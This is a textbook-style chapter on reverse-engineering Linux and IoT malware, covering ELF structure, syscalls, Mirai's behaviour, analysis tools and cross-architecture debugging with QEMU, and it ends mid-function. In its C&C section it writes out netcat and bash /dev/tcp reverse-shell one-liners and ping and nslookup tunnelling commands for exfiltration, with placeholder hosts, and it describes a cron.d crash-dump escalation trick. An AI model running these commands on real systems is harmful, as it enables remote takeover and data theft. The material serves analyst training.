Many reverse engineers working in antivirus companies spend most of their time analyzing 32-bit malware for Windows, and even the idea of analyzing something beyond that may be daunting at first. However, as we will see in this chapter, the ideas behind file formats and malware behavior have so many similarities that, once you become familiar with one of them, it becomes easier and easier to analyze all the subsequent ones.
In this chapter, we will mainly focus on malware for Linux and Unix-like systems. We will cover the file formats used on these systems, go through various tools for static and dynamic analysis, including disassemblers, debuggers, and monitors, and explain typical malware behavior using Mirai as an example.
By the end of this chapter, you will know how to start analyzing samples not only for the x86 architecture but also for various Reduced Instruction Set Computer (RISC) platforms that are widely used in the Internet of Things (IoT) space.
To that end, this chapter is divided into the following sections:
Many engineers think that the Executable and Linkable Format (ELF) is a format only for executable files and that it has been native to the Unix world from the very beginning. In fact, it was accepted as the default binary format for Unix and Unix-like systems only in 1999. It is also used for shared libraries, core dumps, and object modules. As a result, the common file extensions for ELF files include .so, .ko, .o, and .mod. Analysts who mainly work with Windows systems and are used to .exe files may also be surprised that ELF executables most commonly have no file extension at all.
ELF files can also be found on multiple embedded systems and game consoles (for example, PlayStation and Wii), as well as mobile phones. For example, in modern Android, as part of Android Runtime (ART), applications are compiled or translated into ELF files as well.
One of the main advantages of ELF that contributed to its popularity is its flexibility: it supports multiple address sizes (32 and 64 bit) and both byte orders (little- and big-endian), which means that it can work on many different architectures.
Here is a diagram depicting a typical ELF structure:
Figure 11.1 – ELF structures for executable and linkable files
As we can see, it differs slightly between linkable and executable files, but in any case, it should start with a file header. It contains the 4-byte \x7FELF signature (the byte 0x7F followed by the ASCII characters ELF) at the beginning (part of the e_ident field, which we will cover shortly), followed by several fields mainly specifying the file’s format characteristics, some details of the target system, and information about other structure blocks. The size of this header is 52 bytes on 32-bit platforms and 64 bytes on 64-bit platforms: three of its fields are 8 bytes long on 64-bit platforms in order to store 64-bit addresses, as opposed to 4 bytes each on 32-bit platforms.
Here are some of the fields useful for analysis:
The file header is followed by the program header; its offset is stored in the e_phoff field. The main purpose of this block is to give the system enough information to load the file to memory when creating the process. For example, it contains fields describing the type of segment, its offset, virtual address, and size.
Finally, the section header contains information about each section, which includes its name, type, attributes, virtual address, offset, and size. Its offset is stored in the e_shoff field of the file header. From a reverse-engineering perspective, it makes sense to pay attention to the code section (usually, this is .text), as well as the section containing the strings (such as .rodata), as they can give plenty of information about the purposes of malware.
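To make the header layout described above more concrete, here is a minimal Python sketch that decodes the main file header fields from raw bytes. The function name parse_elf_header and the returned dictionary keys are illustrative choices rather than part of any existing tool, and the e_type and e_machine tables are only short excerpts of the values defined by the ELF specification.

```python
import struct

ELF_MAGIC = b"\x7fELF"

# Short excerpts of the e_type and e_machine tables (not exhaustive).
E_TYPES = {1: "REL", 2: "EXEC", 3: "DYN", 4: "CORE"}
E_MACHINES = {
    2: "SPARC", 3: "x86", 4: "m68k", 8: "MIPS", 20: "PowerPC",
    40: "ARM", 42: "SuperH", 62: "x86-64", 183: "AArch64",
}


def parse_elf_header(data: bytes) -> dict:
    """Decode the main ELF file header fields (illustrative helper)."""
    if data[:4] != ELF_MAGIC:
        raise ValueError("missing \\x7fELF signature")
    if len(data) < 16:
        raise ValueError("truncated e_ident")

    ei_class, ei_data = data[4], data[5]
    if ei_class not in (1, 2) or ei_data not in (1, 2):
        raise ValueError("unsupported class or data encoding")

    is_64 = ei_class == 2
    endian = "<" if ei_data == 1 else ">"
    # e_entry, e_phoff and e_shoff are 4 bytes on 32-bit, 8 bytes on 64-bit.
    addr = "Q" if is_64 else "I"
    fmt = endian + "HHI" + addr * 3 + "IHHHHHH"
    header_size = 16 + struct.calcsize(fmt)  # 52 or 64 bytes
    if len(data) < header_size:
        raise ValueError("truncated file header")

    (e_type, e_machine, _version, e_entry, e_phoff, e_shoff,
     _flags, _ehsize, _phentsize, e_phnum, _shentsize, e_shnum,
     _shstrndx) = struct.unpack_from(fmt, data, 16)

    return {
        "bits": 64 if is_64 else 32,
        "endianness": "little" if ei_data == 1 else "big",
        "type": E_TYPES.get(e_type, f"unknown ({e_type})"),
        "machine": E_MACHINES.get(e_machine, f"unknown ({e_machine})"),
        "entry": e_entry,
        "phoff": e_phoff,
        "shoff": e_shoff,
        "phnum": e_phnum,
        "shnum": e_shnum,
        "header_size": header_size,
    }
```

A typical use would be to pass the first 64 bytes of a sample (for example, open(path, "rb").read(64)) and inspect the machine and endianness values before picking the right disassembler settings. Keep in mind that malware may deliberately corrupt some of these fields, so the values should be treated as hints.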
There are many open source tools that can parse the ELF header and present it in a human-friendly way. Here are some of them:
Now, let’s talk about syscalls.
System calls (syscalls) are the interface between the program and the kernel of the OS it is running on. They allow user-mode software to get access to things such as hardware-related or process management services in a structured and secure way.
Here are some examples of the syscalls that are commonly used by malware.
These syscalls provide all the necessary functionality to interact with the filesystem (FS). Here are some examples:
Malware can use these for various purposes, including reading and writing other modules and configuration files.
Network-related syscalls are built around sockets. So far, there are no syscalls working with high-level protocols such as HTTP. Here are the ones that are commonly used by malware:
Network syscalls are commonly used to communicate with C&C, peers, and legitimate services.
These syscalls can be used by malware to either create new processes or search for existing ones. Here are some common examples:
There are multiple use cases for them, such as detecting and affecting AV software, reverse-engineering tools, and competitors, or finding a process containing valuable data.
Some syscalls can be used by malware for more specific purposes, for example, self-defense:
Of course, there are many more syscalls, and the sample you’re working on may use several of them in order to operate properly. The selection that’s been provided describes some of the top picks that may be worth paying attention to when trying to understand malware functionality.
When an engineer starts analyzing a sample and opens it in a disassembler, here is how the syscalls will look:
Figure 11.2 – A Mirai clone compiled for the ARM platform using the connect syscall
In the preceding screenshot, we can see that the number 0x90011B is used in assembly, instead of a more human-friendly connect string. Hence, it is required to map these numbers to strings first. The exact approach will vary depending on the tools that are used. For example, in IDA, in order to find the proper syscall mappings for ARM, the engineer needs to do the following:
Figure 11.3 – The ARM syscall mappings in IDA
In this case, it definitely makes sense to use a script in order to find all the places where syscalls are being used throughout the code and map them to their actual names to speed up the analysis.
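The core of such a script is a lookup from the immediate value to a syscall name. The following Python sketch shows the idea for the older ARM calling convention (OABI), where the syscall number is encoded in the instruction as 0x900000 plus the number. The function name resolve_arm_svc is hypothetical, and the table is only a small excerpt of the Linux ARM syscall table. Samples built for the newer EABI convention pass the number in a register instead, so they would need a different approach.

```python
# Base value added to the syscall number in the SWI/SVC immediate (ARM OABI).
ARM_OABI_SYSCALL_BASE = 0x900000

# A small excerpt of the Linux ARM syscall table (not exhaustive).
ARM_SYSCALL_NAMES = {
    1: "exit", 2: "fork", 3: "read", 4: "write", 5: "open", 6: "close",
    281: "socket", 282: "bind", 283: "connect", 284: "listen",
    285: "accept", 290: "sendto", 292: "recvfrom",
}


def resolve_arm_svc(immediate: int) -> str:
    """Map an OABI SWI/SVC immediate to a syscall name (illustrative)."""
    if immediate < ARM_OABI_SYSCALL_BASE:
        raise ValueError("immediate is below the OABI syscall base")
    number = immediate - ARM_OABI_SYSCALL_BASE
    return ARM_SYSCALL_NAMES.get(number, f"unknown_{number}")


# The value seen in the disassembly: 0x90011B - 0x900000 = 283.
print(resolve_arm_svc(0x90011B))
```

In a real script, this lookup would be called for every SWI/SVC instruction found by the disassembler's scripting API, and the result would be attached to the instruction as a comment.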
Now, let’s explore various behavioral patterns commonly found in malware.
Generally, all malware of the same type shares similar needs regardless of the platform, mainly the following:
Some malware families behave as worms do, aiming to penetrate deeper into reached networks; this behavior is commonly called lateral movement.
The implementation depends on the target systems, given that they may use different default tools and file paths. In this section, we will go through the common attack stages and provide examples of actual implementations.
There are multiple ways that malware can get into a target system. While some approaches might be similar to those with the Windows platform, others will be different because of the different purposes they serve. Let’s summarize the most common situations:
This is how they look in Mirai’s source code:
Figure 11.4 – Hardcoded encrypted credentials in Mirai’s source code
As you can see, in this case, attackers preferred to store them in the encrypted form, but they still stored the original values as comments for easier maintenance.
Figure 11.5 – Multiple exploits embedded into a Mozi malware sample
For lateral movement, the same approaches are often used. Beyond this, it is also possible to collect credentials on the first system and try to reuse them with nearby devices.
As we can see, there is no easy way to fix these issues on already existing devices. In the future, the situation will improve only when device manufacturers become interested in securing their products, either because customers demand it and it becomes a competitive advantage, or because specific legislation requires it. It is quite unlikely that the state of affairs will change drastically any time soon.
Persistence mechanisms can vary greatly depending on the target system. In most cases, they rely on the automatic ways of executing code that are already supported by the relevant OS. Here are the most common examples of how this can be achieved:
Other custom options specific to certain operating systems are also possible, but these are some of the most common cases often used by hackers and modern malware.
It is also worth mentioning that some malware families don’t bother with implementing persistence mechanisms at all, as they expect to be able to easily come back to the same device after its reboot through the same channel.
As we can see, there are multiple ways that malware can achieve persistence with the privileges it obtains immediately after penetration. It comes as no surprise that malware targeting IoT devices will try them first. For example, the VPNFilter malware incorporated crontab to achieve persistence, and Torii, incorporating some of Mirai’s code, tries several techniques, one of which is using the local ~/.bashrc file.
However, if at any stage the privilege escalation is required, there are several common ways that this can be achieved:
There are other creative ways that persistence can be achieved. For example, on older Linux kernels, it is possible to set the current directory of an attacker’s program to /etc/cron.d, request the dump’s creation in case of failure, and then deliberately crash it. In this case, the dump, the content of which is controlled by the attacker, will be written to /etc/cron.d and then treated as a text file, and therefore its content will be executed with elevated privileges.
Now, let’s dive deeper into the various ways that malware may communicate with a remote server controlled by the attackers.
There are multiple standard system tools found by default on many systems that can be used to interact with remote machines to either download or upload data, depending on their availability:
Figure 11.6 – IoT malware trying to download payloads using either wget or curl
For devices using the BusyBox suite, alternative commands such as busybox wget or busybox ftpget can be used instead. The nc (netcat) and scp tools can also be used for similar purposes. Another advantage of nc is that some versions of it can be used to establish a reverse shell:
nc -e /bin/sh <remote_ip> <remote_port>
There are many ways this can be achieved; even bash alone (in some versions) may be enough:
bash -i >& /dev/tcp/<remote_ip>/<remote_port> 0>&1
Pre-installed script languages such as Python or Perl provide plenty of options for communicating with remote servers, including the creation of interactive shells.
An example of a more advanced way to exfiltrate data bypassing strong firewalls is by using the ping utility and storing data in padding bytes (ICMP tunneling) or sending data using third-level (or above) domain names with the nslookup utility (DNS tunneling):
ping <remote_ip> -p <exfiltrated_data>
nslookup $encodeddata.<attacker_domain>
The compiled malware generally uses standard network syscalls to interact with the C&C or peers; see the preceding list of common entries for more information.
The main purposes of malware attacking IoT devices and Linux-based servers are generally as follows:
Figure 11.7 – Part of the script used by the IoT cryptocurrency mining malware
As we can see, the focus here is quite different from the traditional Windows malware due to the nature of the targeted systems.
Generic anti-reverse-engineering tricks such as detecting breakpoints using checksums or an exact match, stripping symbol information, incorporating data encryption, or using custom exceptions or signal handlers (setting them using the signal syscall that we discussed previously) will work perfectly for ELF files, pretty much the same as they do for PE files:
Figure 11.8 – An example of a custom xor-based string decryption algorithm in IoT malware
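As an illustration of how such string encryption can be reversed during analysis, here is a minimal Python sketch of single-byte XOR decoding. It is a generic example rather than the algorithm from any particular sample: the function names, the key 0x5A, and the encrypted bytes are all made up for demonstration, and real samples may use multi-byte keys or additional transformations.

```python
def xor_decode(blob: bytes, key: int) -> bytes:
    """XOR every byte with a single-byte key (the same call encodes and decodes)."""
    return bytes(b ^ key for b in blob)


def candidate_keys(blob: bytes):
    """Yield (key, text) pairs for keys that produce fully printable ASCII."""
    for key in range(1, 256):
        plain = xor_decode(blob, key)
        if plain and all(0x20 <= c <= 0x7E for c in plain):
            yield key, plain.decode("ascii")


# Hypothetical encrypted string, as it might be carved from a data section.
encrypted = xor_decode(b"/bin/busybox", 0x5A)

for key, text in candidate_keys(encrypted):
    if "busybox" in text:
        print(hex(key), text)
```

When the key is unknown, brute-forcing all 255 values and filtering by printable output, as candidate_keys does, is usually fast enough. When the key is visible in the decryption routine, calling xor_decode directly on each encrypted blob is sufficient.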
There are multiple ways that the malware can take advantage of the ELF structure in order to complicate analysis. The two most popular ways are as follows:
Among existing open source packing tools, UPX remains the primary option used by IoT malware developers. However, it is common to corrupt the internal UPX structures of packed samples, which makes it impossible to unpack them straight away using the standard upx -d functionality. The most common corruption techniques involve the following:
In addition, attackers may use a not-yet-released development version of UPX to protect their samples. In this case, the latest release version of UPX may not be able to process them even with the aforementioned modifications reverted. To circumvent this technique, use packer detection tools such as DiE to correctly identify the version of the packer applied, and then use the matching version of the UPX tool, compiling it on your own if necessary.
In terms of syscalls, the most common way to detect debuggers and tools such as strace is to use ptrace with the PTRACE_TRACEME or PTRACE_ATTACH arguments to either make it harder to attach to the sample using the debugger or detect the debugging that is already happening.
Finally, the prctl (with a PR_SET_NAME argument) and chroot syscalls can be used to change the name of the process and its root directory respectively to avoid detection.
Some malware families go well beyond using classic anti-analysis techniques. An example would be the ZHtrap botnet, which is not only able to figure out whether it is running in a real environment or a honeypot but also to set up its own honeypot on a compromised device to passively build up a list of devices attempting to connect to it.
Another great example is rootkits, which can be used to achieve stealth capabilities, for example, to hide particular files, directories, or processes from the user. These are generally kernel modules that can be installed using the standard insmod command. The most common way that hiding can happen in this case is by hooking syscalls. Many rootkit malware families are based on public open source projects such as Adore-Ng or Knark.
Now, let’s talk about which tools can help us analyze IoT threats and how to use them properly.
There are multiple tools available to engineers that may facilitate both static and dynamic analysis of Linux malware. In this section, we will cover the most popular solutions and provide basic guidelines on how to start using them efficiently.
We have already covered the tools that can present the ELF structure information in a human-friendly way. Beyond this, there are many other categories of tools that will help speed up analysis.
The most popular solution for file type detection is the standard file utility. It not only recognizes the type of data but also provides other important information. For example, for ELF files, it will also confirm the following:
Figure 11.9 – The output of a file tool used against an IoT malware sample
Its functionality is also incorporated into the libmagic library.
Another solution, free for non-commercial use, is the TrID tool, which features an expandable database.
While the term data carving is mainly used in forensics, it is always handy to extract all possible artifacts from the binary before going deeper into analysis. Here are some of the handy tools that are available:
Disassemblers are heavy weapons that can give you the best idea about malware functionality, but they may also take the longest time to master and work with. If you are unfamiliar with assembly, it is recommended to go through Chapter 2, A Crash Course in Assembly and Programming Basics, first to get an idea of how it works. The list of known players is actually quite big, so let’s split it roughly into two categories – tools and frameworks.
Here is a list of common tools that can be used to quickly access the assembly code:
Figure 11.10 – A list of architectures supported by ODA
Figure 11.11 – The multiple analysis options in Ghidra
This is definitely not an exhaustive list, and the number of such tools keeps growing, which gives engineers the ability to find the one that suits their needs best.
These libraries are supposed to be used to develop other tools, or to just solve some particular engineering task, using a custom script to call them:
With a big list of players on this market, the analyst may have an understandable question – which solution is the best? Let’s try to answer this question together.
A tool should always be chosen according to the relevant task and prior knowledge. If the purpose is to understand the functionality of a small shellcode, then even standard tools such as objdump may be good enough. Otherwise, it generally makes sense to master more powerful all-in-one solutions that support either multiple architectures or the main architecture of interest. While the learning curve in this case will be much steeper, this knowledge can later be re-applied to handle new tasks and eventually can save an impressive amount of time. The ability to do both static and dynamic analysis in one place would definitely be an advantage as well.
Open source solutions nowadays provide a pretty decent alternative to the commercial ones, so ultimately, the decision should be made by the engineer. If money doesn’t matter, then it makes sense to try several of them; check which one has the better interface, documentation, and community; and eventually, stick to the most comfortable solution.
Finally, if you are a developer aiming to automate a certain task (for example, building a custom malware monitoring system for IOC extraction), then it makes sense to have a look at open source engines and modules that can drastically speed up the development.
It always makes sense to debug malicious code in an isolated safe environment that is easy to reset back to the previous state. For these purposes, engineers generally use virtual machines (VMs) or dedicated physical machines with software that allows quick restoration.
These tools can be used to monitor malware actions that are performed on the testing system:
Figure 11.12 – Analyzing malware using a strace tool
It is always worth keeping in mind that behavioral analysis techniques generally produce limited results and, in most cases, should be carefully used together with static analysis to understand the full picture.
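When a monitoring log becomes long, a quick summary of which syscalls were made can help decide where to look first. The following Python sketch counts syscall names in strace-style text output. The regular expression covers only the common line shapes (an optional PID prefix, the call, and its return value), and the sample lines, including the address 192.0.2.1, are invented for illustration rather than taken from a real trace.

```python
import re
from collections import Counter

# Matches lines such as: [pid 1234] connect(3, {...}, 16) = -1 ECONNREFUSED (...)
_STRACE_LINE = re.compile(
    r"^(?:\[pid\s+\d+\]\s+|\d+\s+)?"   # optional PID prefix (-f or -o output)
    r"(?P<name>\w+)\((?P<args>.*)\)"   # syscall name and raw arguments
    r"\s+=\s+(?P<ret>-?\d+|\?)"        # start of the return value
)


def summarize_strace(lines) -> Counter:
    """Count how many times each syscall appears in strace output lines."""
    counts = Counter()
    for line in lines:
        match = _STRACE_LINE.match(line.strip())
        if match:
            counts[match.group("name")] += 1
    return counts


# Hypothetical log excerpt.
SAMPLE_LOG = [
    'execve("./sample", ["./sample"], 0x7ffc0 /* 20 vars */) = 0',
    "socket(AF_INET, SOCK_STREAM, IPPROTO_IP) = 3",
    'connect(3, {sa_family=AF_INET, sin_port=htons(23), '
    'sin_addr=inet_addr("192.0.2.1")}, 16) = -1 ECONNREFUSED (Connection refused)',
    "[pid  1234] connect(4, {sa_family=AF_INET, ...}, 16) = 0",
    "+++ exited with 0 +++",
]

for name, count in summarize_strace(SAMPLE_LOG).most_common():
    print(name, count)
```

Lines that do not look like a completed call, such as signal notifications or exit markers, are simply skipped, so the counts should be read as a rough overview rather than a complete record.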
These tools intercept network traffic, which can give the analyst valuable insight into malware behavior:
The recorded network traffic can be shared between multiple engineers to speed up the analysis if necessary.
Debuggers provide more control over the execution process and can also be used to tamper and extract data on the fly:
Figure 11.13 – Stopping at the entry point in GDB and disassembling the instructions there
Now, let’s talk about emulators.
This software can be used to emulate instructions of the samples without actually executing them directly on the testing machine. It can be extremely useful when analyzing malware that’s been compiled for a platform that’s different from the one being used for analysis:
Figure 11.14 – An example of the Unicorn-based code used to emulate the shellcode
Finally, as an example, let’s talk about how to use radare2 for both static and dynamic analysis.
Many first-time users struggle with using radare2 because of the impressive number of commands and hotkeys supported. However, there is no need to use it as an analog for GDB. radare2 features very convenient graphical interfaces that can be used similarly to IDA or other high-end commercial tools. In addition, multiple third-party UIs are available. To begin with, to enable debugging, the sample should be opened with the -d command-line argument, as in the following example:
r2 -d sample.bin
Here is a list of some of the most common commands supported (all the commands are case-sensitive):
Figure 11.15 – An example of the commands supported by radare2
Visual mode hotkeys: Visual mode has its own set of hotkeys available that generally significantly speed up the analysis. In order to enter the visual mode, use the V command:
Here is how debugging using radare2’s visual mode will look:
Figure 11.16 – Staying at the entry point of malware in radare2 using its visual mode
Many engineers prefer to start the debugging process by running the aaa command (or using the -A command-line option) in order to analyze functions and then switch to visual mode and continue working there, but it depends on personal preference:
Figure 11.17 – Running an aaa command in radare2 before starting the actual analysis
Now, it is time to apply all this knowledge and dive deep into the internals of one of the most notorious IoT malware families – Mirai.
For many years, the Windows platform was the main target of attackers because it was the most common desktop OS. This means that many beginner malware developers had it at home to experiment with, and many organizations used it on the desktops of non-IT personnel, for example, accountants that had access to financial transactions, or maybe diplomats that had access to some high-profile confidential information.
Against this background, the Mirai (meaning future in Japanese) malware fully deserved its notoriety, as it opened the door to a new, previously largely unexplored area for malware – the IoT. While it wasn’t the first malware to leverage it (other botnets, such as Qbot, were known long before), the scale of its activity clearly showed everybody how hardcoded credentials such as root/123456 on largely ignored smart devices could represent a really serious threat when thousands of compromised appliances suddenly start DDoS attacks against benign organizations across the world. To make things worse, the author of Mirai released its source code to the public, which led to the appearance of multiple clones in a short time. Here is the structure of the released project:
Figure 11.18 – An example of the Mirai source code available on GitHub
In this section, we will put our obtained knowledge into practice and become familiar with behavioral patterns used by this malware.
Luckily for reverse engineers, the malware author provided a good description of the malware functionality, accompanied by the source code, and even corrected some mistakes that were made by the engineers who previously analyzed it.
The bot scans IP addresses, which are selected pseudo-randomly with certain ranges excluded, asynchronously using TCP SYN packets, in order to find target candidates with open default Telnet ports first. Here is how it looks in the source code:
Figure 11.19 – Mirai malware excluding several IP ranges from scanning
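The exclusion logic itself is simple to model, which can be handy when checking whether a given address would be skipped by a sample's scanner. Here is a minimal Python sketch of such a check. The networks listed are common reserved and private ranges chosen for illustration and are not claimed to match the exact list in Mirai's source code; the name is_excluded is likewise hypothetical.

```python
import ipaddress

# Illustrative reserved/private ranges (an assumption, not Mirai's exact list).
EXCLUDED_NETWORKS = [
    ipaddress.ip_network(cidr)
    for cidr in (
        "0.0.0.0/8",       # "this" network
        "10.0.0.0/8",      # private
        "127.0.0.0/8",     # loopback
        "169.254.0.0/16",  # link-local
        "172.16.0.0/12",   # private
        "192.168.0.0/16",  # private
        "224.0.0.0/4",     # multicast
    )
]


def is_excluded(address: str) -> bool:
    """Return True if the IPv4 address falls into any excluded network."""
    ip = ipaddress.ip_address(address)
    return any(ip in network for network in EXCLUDED_NETWORKS)


for candidate in ("127.0.0.1", "10.1.2.3", "8.8.8.8"):
    print(candidate, is_excluded(candidate))
```

When analyzing a compiled clone, the actual list can be recovered from the comparison constants in the address-generation routine and substituted into EXCLUDED_NETWORKS.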
Then, the malware brute-forces access to the discovered candidate machines using pairs of hardcoded credentials. The successful results are passed to the server to balance the load, and all data is stored in a database. The server then activates a loader module that verifies the system and delivers the bot payload using either the wget or tftp tool if available; otherwise, it uses a tiny embedded downloader. The malware has pre-compiled binary payloads for several different architectures (ARM, MIPS, SPARC, SuperH, PowerPC, and m68k). After this, the cycle repeats, and the just-deployed bots continue searching for new victims.
The main purpose of this malware is to organize DDoS attacks on demand. Several types of attacking techniques are supported, including the following:
Here is a snippet of Mirai’s source code mentioning them:
Figure 11.20 – The different attack vectors of Mirai malware
As we can see here, the authors implemented multiple options so that they could select the most efficient attack against a particular victim.
The original Mirai doesn’t survive the reboot. Instead, the malware kills the software associated with Telnet, SSH, and HTTP ports in order to prevent other malware from entering the same way, as well as to block legitimate remote administration activity. Doing this complicates the remediation procedure. It also tries to kill rival bots such as Qbot and Wifatch if found on the same device.
Beyond this, the malware hides its process name using the prctl system call with the PR_SET_NAME argument, and uses chroot to change the root directory and avoid detection by this artifact. In addition, both hardcoded credentials and the actual C&C address are encrypted, so they won’t appear in plain text among the strings that were used.
First, it is worth noting that not all Mirai modifications end up with a publicly known unique name; often, many of them fall under the same generic Mirai category. An example would be the Mirai variant that, in November 2016, propagated using the RCE attack against DSL modems via TCP port 7547 (TR-069/CWMP).
Here are some other examples of known botnets that borrowed parts of the Mirai source code:
Other botnets exist, and often some independent malware also uses pieces of Mirai source code, which can mix up the attribution. There are multiple modifications that different actors incorporate into their clones, including the following:
Now, let’s talk about other famous IoT malware families.
While Mirai became extremely famous due to the scale of the attacks performed, multiple other independent projects existed before and after it. Some of them incorporated pieces of Mirai’s code later in order to extend their functionality.
Here are some of the most notorious IoT malware families and the approximate years when they became known to the general public. All of them can be roughly split into two categories.
The following category consists of malware that actually aims to harm:
Figure 11.21 – Some of the public DHT servers misused by Mozi malware
Then, there’s malware whose author’s intent was allegedly to make the world a better place. Examples of such families include the following:
Now, let’s talk about how to analyze samples compiled for different architectures.
Generally, it is much easier to find tools for more widespread architectures, such as x86. Still, there are plenty of options available to analyze samples that have been built for other instruction sets. As a rule of thumb, always check whether you can get the same sample compiled for an architecture you have more experience with. This way, you can save lots of time and provide a higher-quality report.
All basic tools, such as file type detectors, as well as data carving tools, will more than likely process samples associated with most of the architectures that currently exist. Online DisAssembler (ODA) supports multiple architectures, so it shouldn’t be a problem for it either. In addition, powerful tools such as IDA, Ghidra, and radare2 will also handle the static analysis part in most cases, regardless of the host architecture. If the engineer has access to the physical RISC machine to run the corresponding sample, it is always possible to either debug it there using GDB (or another supported debugger) or to use the gdbserver tool to let other debuggers connect to it via the network from the preferred platform:
Figure 11.22 – IDA processing a Mirai clone for a SPARC architecture
Here is how a Mirai-like sample can be analyzed using radare2:
Figure 11.23 – radare2 processing the same Mirai clone for the PowerPC architecture
Now, let’s go through the most popular RISC architectures that are currently targeted by IoT malware in detail.
As time shows, all static analysis tools aiming to support other architectures beyond x86 generally start from the 32-bit ARM, so it is generally easier to find good solutions for it. Since the 64-bit ARM was introduced more recently, support for it is still more limited. Still, besides IDA and radare2, tools such as Relyze, Binary Ninja, and Hopper support it as well.
However, this becomes especially relevant in terms of dynamic analysis. For example, at the moment, IDA only ships the debugging server for the 32-bit version of ARM for Linux. While it may be time-consuming to get and use the physical ARM machine to run a sample, one of the possible solutions here is to use QEMU and run a GDB server on the x86-based machine:
qemu-arm -g 1234 ./binary.arm
If the sample is dynamically linked, then additional ARM libraries may need to be installed separately, for example, using the libc6-armhf-cross package (armel can be used instead of armhf for ARM versions older than 7) for a 32-bit ARM or libc6-arm64-cross for a 64-bit ARM. The path to them (in this case, it will be /usr/arm-linux-gnueabihf or /usr/arm-linux-gnueabi for 32-bit and /usr/aarch64-linux-gnu for 64-bit respectively) can be provided by either using the -L argument or setting the QEMU_LD_PREFIX environment variable.
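Since the emulator name and library path have to match the sample's architecture, it can be convenient to assemble the command line programmatically. The following Python sketch builds the QEMU user-mode command with the -g and -L arguments for the three cases described above. The function name build_qemu_gdb_command and the armhf, armel, and arm64 keys are illustrative choices, and the paths assume the cross-library packages were installed in their default locations.

```python
# Emulator binary and library prefix per target (paths as described above).
QEMU_TARGETS = {
    "armhf": ("qemu-arm", "/usr/arm-linux-gnueabihf"),
    "armel": ("qemu-arm", "/usr/arm-linux-gnueabi"),
    "arm64": ("qemu-aarch64", "/usr/aarch64-linux-gnu"),
}


def build_qemu_gdb_command(target: str, sample: str, port: int = 1234) -> list:
    """Build an argument list that starts a sample under QEMU with a GDB stub."""
    try:
        emulator, lib_prefix = QEMU_TARGETS[target]
    except KeyError:
        raise ValueError(f"unsupported target: {target}") from None
    # -g: wait for a GDB connection on the port; -L: prefix for target libraries.
    return [emulator, "-g", str(port), "-L", lib_prefix, sample]


print(" ".join(build_qemu_gdb_command("armhf", "./binary.arm")))
```

The resulting list can be passed to subprocess.Popen inside an isolated analysis VM. For statically linked samples, the -L argument is not needed and can be dropped.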
Now, it becomes possible to attach to this sample using other debuggers, for example, radare2 from another Terminal:
r2 -a arm -b 32 -d gdb://127.0.0.1:1234
IDA supports the remote GDB debugger for the ARM architecture as well:
Figure 11.24 – Available debuggers for the 32-bit ARM sample in IDA
GDB has to be compiled for the specified target platform before it can be used to connect to this server; the popular solution here is to use a universal gdb-multiarch tool.
The MIPS architecture remains popular nowadays, so it is no surprise that the number of tools supporting it is growing as well. While Hopper and Relyze don’t support it at the moment, Binary Ninja mentions it among its supported architectures. And of course, solutions such as IDA or radare2 can also be used.
The situation becomes more complicated when it comes to dynamic analysis. For example, IDA still doesn’t provide a dedicated debugging server tool for it. Again, in this case, the engineer mainly has to rely on the QEMU emulation, with IDA’s remote GDB debugger, radare2, or GDB itself this time.
To connect to the GDB server using GDB itself, the following commands need to be used once it’s been started:
target remote 127.0.0.1:1234
file <path_to_executable>
Once connected, it becomes possible to start analyzing the sample.
As with the previous two cases, static analysis is not a big problem here, as multiple tools support PPC architecture, for example, radare2, IDA, Binary Ninja, ODA, or Hopper. In terms of dynamic analysis, the combination of QEMU and either IDA or GDB should do the trick:
Figure 11.25 – Debugging Mirai for PowerPC in IDA on Windows via a QEMU GDB server on x86
As we can see, less prevalent architectures may require a more sophisticated setup to perform comfortable debugging.
SuperH (also known as Renesas SH) is the collective name of several instruction sets (such as SH-1, SH-2, and SH-2A), so it makes sense to double-check exactly which one needs to be emulated. Most samples should work just fine on the SH4, as these CPU cores are supposed to be upward-compatible. This architecture is not the top choice for either attackers or reverse engineers, so the range of available tools may be more limited. For static analysis, it makes sense to stick to solutions such as radare2, IDA, or ODA. Since IDA doesn’t seem to provide remote GDB debugger functionality for this architecture, dynamic analysis has to be handled through QEMU and either radare2 or GDB, the same way that we described earlier:
Figure 11.26 – Debugging Mirai for SuperH on the x86 VM using radare2 and QEMU
If for some reason, the binary emulation doesn’t work properly, then it may make sense to obtain real hardware and perform debugging either there or remotely using the GDB server functionality.
The SPARC design was terminated by Oracle in 2017, but there are still lots of devices that implement it. The number of static analysis tools supporting it is quite limited, so it makes sense to mainly use universal solutions such as ODA, radare2, Ghidra, and IDA. For dynamic analysis, QEMU can be used with GDB the same way that we described previously, as it looks as though neither radare2 nor IDA supports a GDB debugger for this architecture at the moment:
Figure 11.27 – Debugging a Mirai sample for SPARC on the x86 VM using GDB with TUI and QEMU
Various GDB-syntax-highlighting tools can be used to make the debugging process more enjoyable.
Now, you know how to deal with the most common architectures targeted by IoT malware families. In the following section, we will talk about what to do if you have to deal with something not covered here.
What happens if, at some stage, you have to analyze a sample built for an architecture that is not mentioned here? There are many other options available at the moment, and more will very likely appear in the future. As long as there is a meaningful number of devices (or these devices are of particular potential interest to attackers), and especially if it is pretty straightforward to add support for them, sooner or later, a new malware family exploiting their functionality may appear. In this section, we will provide guidelines on how to handle malware for virtually any architecture.
First, identify the exact architecture of the sample; for this purpose, open source tools such as file will work perfectly. Next, check whether this architecture is supported by the most popular reverse engineering tools for static and dynamic analysis. IDA, Ghidra, radare2, and GDB are probably the best candidates for this task because of the impressive number of architectures supported, very high-quality output, and, in some cases, the ability to perform both static and dynamic analysis in one place:
Figure 11.28 – The radare2 man page describing the argument to specify the architecture
The ability to debug may drastically speed up the analysis, so it makes sense to check whether it is possible to make the corresponding setup for the required architecture. This may involve running a sample on the physical machine or an emulator such as QEMU and connecting to it locally or remotely. Check for native architecture debugging tools; is it GDB or maybe something else? Some engineers prefer to use more high-end tools such as IDA with GDB together but separately (so, debug only specific blocks using GDB and keep the markup knowledge base in IDA).
When you get access to the disassembly, check which entity currently administrates this architecture. Then, find the official documentation describing the architecture on their website, particularly the parts describing registers, groups, and syntax for the supported instructions. Generally, the more time you have available to familiarize yourself with the nuances, the less time you will spend later on analysis.
Finally, never be ashamed to run a quick search for unique strings that have been extracted from the sample on the internet, as there is always a chance that someone else has already encountered and analyzed it. In addition, the same sample may be available for a more widespread architecture.
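Extracting such strings does not require the sample's architecture to be supported by any tool. Here is a minimal Python sketch that pulls printable ASCII sequences out of raw bytes, similar in spirit to the standard strings utility. The function name extract_strings, the default minimum length of 6, and the sample bytes are assumptions made for illustration.

```python
import re


def extract_strings(data: bytes, min_len: int = 6) -> list:
    """Return printable ASCII sequences of at least min_len characters."""
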